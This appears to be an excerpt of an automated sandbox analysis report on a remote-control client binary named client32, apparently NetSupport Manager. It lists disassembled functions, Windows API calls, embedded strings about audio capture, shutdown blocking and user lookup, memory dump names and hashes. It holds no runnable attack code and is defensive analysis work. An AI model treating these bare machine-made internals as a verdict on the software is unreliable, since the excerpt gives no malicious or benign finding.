                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                • String ID: %s%s$Client$DecompressJPEGToBitmap$DecompressPNGToBitmap$ImageFile$ImageFileUser$PCIImage.dll
                                                                                                                                                                • API String ID: 2111968516-1286714176
                                                                                                                                                                • Opcode ID: 16156c97f269215458a29c73816be307994206807deff759477be4abbe46c0e1
                                                                                                                                                                • Instruction ID: cfced163e91c544f1d9a441fe05b752d20d9a2d0abefb67461bd630bfcd17819
                                                                                                                                                                • Opcode Fuzzy Hash: 16156c97f269215458a29c73816be307994206807deff759477be4abbe46c0e1
                                                                                                                                                                • Instruction Fuzzy Hash: 0C911975A50319AFEB11DFA4CD84FDAF3B4BF88725F1041A8E519A7284EB30AA40CF51
                                                                                                                                                                Function 1100B310 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • _malloc.LIBCMT ref: 1100B366
                                                                                                                                                                  • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                                                                                  • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                                                                                  • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                                                                                  • Part of subcall function 1100AC40: EnterCriticalSection.KERNEL32(000000FF,59FD48C0,?,00000000,00000000), ref: 1100AC84
                                                                                                                                                                  • Part of subcall function 1100AC40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACA2
                                                                                                                                                                  • Part of subcall function 1100AC40: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ACEE
                                                                                                                                                                  • Part of subcall function 1100AC40: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD35
                                                                                                                                                                  • Part of subcall function 1100AC40: CloseHandle.KERNEL32(00000000), ref: 1100AD3C
                                                                                                                                                                  • Part of subcall function 1100AC40: _free.LIBCMT ref: 1100AD53
                                                                                                                                                                  • Part of subcall function 1100AC40: FreeLibrary.KERNEL32(?), ref: 1100AD6B
                                                                                                                                                                  • Part of subcall function 1100AC40: LeaveCriticalSection.KERNEL32(?), ref: 1100AD75
                                                                                                                                                                • EnterCriticalSection.KERNEL32(1100CA5A,Audio,DisableSounds,00000000,00000000,59FD48C0,?,1100CA4A,00000000,?,1100CA4A,?), ref: 1100B39B
                                                                                                                                                                • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA4A,?), ref: 1100B3B8
                                                                                                                                                                • _calloc.LIBCMT ref: 1100B3E9
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA4A,?), ref: 1100B40F
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(1100CA5A,?,1100CA4A,?), ref: 1100B449
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(1100CA4A,?,?,1100CA4A,?), ref: 1100B46E
                                                                                                                                                                Strings
                                                                                                                                                                • DisableSounds, xrefs: 1100B342
                                                                                                                                                                • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4C3
                                                                                                                                                                • InitCaptureSounds NT6, xrefs: 1100B48E
                                                                                                                                                                • \\.\NSAudioFilter, xrefs: 1100B3B0
                                                                                                                                                                • Audio, xrefs: 1100B347
                                                                                                                                                                • Vista new pAudioCap=%p, xrefs: 1100B4D3
                                                                                                                                                                • Vista AddAudioCapEvtListener(%p), xrefs: 1100B4F3
                                                                                                                                                                • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B51C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                                                                                                • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                                                                                                • API String ID: 1843377891-2362500394
                                                                                                                                                                • Opcode ID: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                                                                                                • Instruction ID: 3f9b0c4355a442be161718b687c517c7c1a8a488e2b9041c50d9e3709ff29e90
                                                                                                                                                                • Opcode Fuzzy Hash: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                                                                                                • Instruction Fuzzy Hash: 8E51D9B5E0464AAFE704CF74DC80BAEF7A4FB04759F10467AE929A3240E7717550C7A1
                                                                                                                                                                Function 11125200 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 240comwindowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 1112523A
                                                                                                                                                                • SendMessageA.USER32(?,0000043C,00000000,?), ref: 11125251
                                                                                                                                                                • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 11125280
                                                                                                                                                                • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 111252B6
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • OleCreateStaticFromData.OLE32(00000000,111C093C,00000002,?,?,?,?), ref: 111253C2
                                                                                                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 111253D8
                                                                                                                                                                • _memset.LIBCMT ref: 111253E5
                                                                                                                                                                • CoUninitialize.OLE32 ref: 11125499
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Create$BytesLockMessage$ContainedDataDocfileErrorExitFromGlobalInitializeLastObjectProcessSendStaticUninitialize_memsetwsprintf
                                                                                                                                                                • String ID: ..\CTL32\RichInsert.cpp$8$pLockBytes$pOleClientSite$pRichEditOle$pStorage
                                                                                                                                                                • API String ID: 1820880743-4036218486
                                                                                                                                                                • Opcode ID: b8f593f3550aa9e0f779f3b8c62ca3ee8f9d3103c1fcafdad78b4b8c3047e15f
                                                                                                                                                                • Instruction ID: 08d7bdd5ab5c60396c417d70c353951ed5684100983e189a7c8dd5e42ede2f0c
                                                                                                                                                                • Opcode Fuzzy Hash: b8f593f3550aa9e0f779f3b8c62ca3ee8f9d3103c1fcafdad78b4b8c3047e15f
                                                                                                                                                                • Instruction Fuzzy Hash: D69128B5E002599FDB54DFA8CCC4ADDF7B9FB88314F608169E519AB280EB70A941CB50
                                                                                                                                                                Function 1102B1D0 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 220COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • GetLastError.KERNEL32(?), ref: 1102B331
                                                                                                                                                                • GetLastError.KERNEL32(?), ref: 1102B38E
                                                                                                                                                                • _fgets.LIBCMT ref: 1102B3C0
                                                                                                                                                                • _strtok.LIBCMT ref: 1102B3E8
                                                                                                                                                                  • Part of subcall function 11163016: __getptd.LIBCMT ref: 11163034
                                                                                                                                                                • _fgets.LIBCMT ref: 1102B424
                                                                                                                                                                • _strtok.LIBCMT ref: 1102B438
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                                                                                                                • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                • API String ID: 78526175-1484737611
                                                                                                                                                                • Opcode ID: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                                                                                                • Instruction ID: 83a04ffa2f5f23a923324f4189043cfd8b751997b231b4d3af7dc0cd534076c2
                                                                                                                                                                • Opcode Fuzzy Hash: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                                                                                                • Instruction Fuzzy Hash: 2E81B675D00A1E9BDB10DBA4CC80FEEB7B9AF44309F4440D8E919A7245EA75AB84CF91
                                                                                                                                                                Function 110274C0 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 174windowlibraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000,00000009,?,?,?,?,?,?,1102EC26,?,?,View,Client,Bridge), ref: 11027550
                                                                                                                                                                • LoadIconA.USER32(00000000,00007D0B), ref: 11027565
                                                                                                                                                                • GetSystemMetrics.USER32(00000032), ref: 1102757E
                                                                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 11027583
                                                                                                                                                                • LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027593
                                                                                                                                                                • LoadIconA.USER32(11000000,00000491), ref: 110275AB
                                                                                                                                                                • GetSystemMetrics.USER32(00000032), ref: 110275BA
                                                                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 110275BF
                                                                                                                                                                • LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 110275D0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Load$MetricsSystem$IconImage$Library__wcstoi64
                                                                                                                                                                • String ID: AdminUserAcknowledge$NSM.LIC$PCIRES$_License$product
                                                                                                                                                                • API String ID: 1946015-4092316048
                                                                                                                                                                • Opcode ID: d69988e019c4f8bae60b9e5699ba1e389dd656c446835a4005c1e87fa19d827e
                                                                                                                                                                • Instruction ID: 266221e2c02ccb826b5e3d3fa15dbe6523dfdbad27c253033fa1d47f2ca168a0
                                                                                                                                                                • Opcode Fuzzy Hash: d69988e019c4f8bae60b9e5699ba1e389dd656c446835a4005c1e87fa19d827e
                                                                                                                                                                • Instruction Fuzzy Hash: AB512AB4E407266BEB11CBA48C85F7FF6AC9F58758F500065F905E7681EBB0E901C7A2
                                                                                                                                                                Function 1103B7A0 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 140sleepwindowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1103B8DF
                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 1103B924
                                                                                                                                                                • PostMessageA.USER32(000802A6,00000010,00000000,00000000), ref: 1103B94F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountMessagePostSleepTick
                                                                                                                                                                • String ID: AssertOnReboot$CLTCONN.CPP$Client$DisableLogoff$DisablePowerOff$DisableReboot$DisableShutDown$FALSE || !"assertOnReboot"$GPFOnReboot$_debug$sd - Post WM_CLOSE to %08x
                                                                                                                                                                • API String ID: 507213284-4185502373
                                                                                                                                                                • Opcode ID: 533bc2aa1639c3a490ccc359c7053bef949e47a7e51095008674d9cad4864ca0
                                                                                                                                                                • Instruction ID: 80717d318ace8a1516fe56c6c9f8aedc70c9abe9ba160cb4e89e5a5404e7cce5
                                                                                                                                                                • Opcode Fuzzy Hash: 533bc2aa1639c3a490ccc359c7053bef949e47a7e51095008674d9cad4864ca0
                                                                                                                                                                • Instruction Fuzzy Hash: 8A413734B5072BBFEB11EBA58C82F6DF794AB80B4DF600022FA207A1C1E764B540C756
                                                                                                                                                                Function 110475A0 Relevance: 23.2, APIs: 4, Strings: 9, Instructions: 402COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _memset
                                                                                                                                                                • String ID: "%s%s" %s$@$DoRegisterUser$Error. Failed to get username for Register, e=%d$Info. No logged on user for Register$Login name %s$P$StudentRegister$nsmexec.exe
                                                                                                                                                                • API String ID: 2102423945-3923501237
                                                                                                                                                                • Opcode ID: 7ba6ce302c47b0503db26e569d52d618a70cb858999b45b22d8d523b2960ff84
                                                                                                                                                                • Instruction ID: 8e24205924474c9bfbc8f8a066ef450270d82c25248a7677aea57b4c17336036
                                                                                                                                                                • Opcode Fuzzy Hash: 7ba6ce302c47b0503db26e569d52d618a70cb858999b45b22d8d523b2960ff84
                                                                                                                                                                • Instruction Fuzzy Hash: B8F18EB5D1071A9FDB25DB64CC80BAEB7BDAF44308F1085ECE51A97241EB71AE84CB50
                                                                                                                                                                Function 11031160 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 245sleepwindowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,59FD48C0,00000000,00000000,00000000), ref: 1103119A
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • EnumWindows.USER32(110301B0,00000001), ref: 11031272
                                                                                                                                                                • EnumWindows.USER32(110301B0,00000000), ref: 110312CC
                                                                                                                                                                • Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 110312DC
                                                                                                                                                                • Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 11031313
                                                                                                                                                                  • Part of subcall function 11027E50: _memset.LIBCMT ref: 11027E85
                                                                                                                                                                  • Part of subcall function 11027E50: wsprintfA.USER32 ref: 11027EBA
                                                                                                                                                                  • Part of subcall function 11027E50: WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EFF
                                                                                                                                                                  • Part of subcall function 11027E50: GetExitCodeProcess.KERNEL32(?,?), ref: 11027F13
                                                                                                                                                                  • Part of subcall function 11027E50: CloseHandle.KERNEL32(?,00000000), ref: 11027F45
                                                                                                                                                                  • Part of subcall function 11027E50: CloseHandle.KERNEL32(?), ref: 11027F4E
                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,?,?,?,?,00000000), ref: 1103132B
                                                                                                                                                                • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 110313E7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                                                                                                                                • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                                                                                                                                • API String ID: 3887438110-1852639040
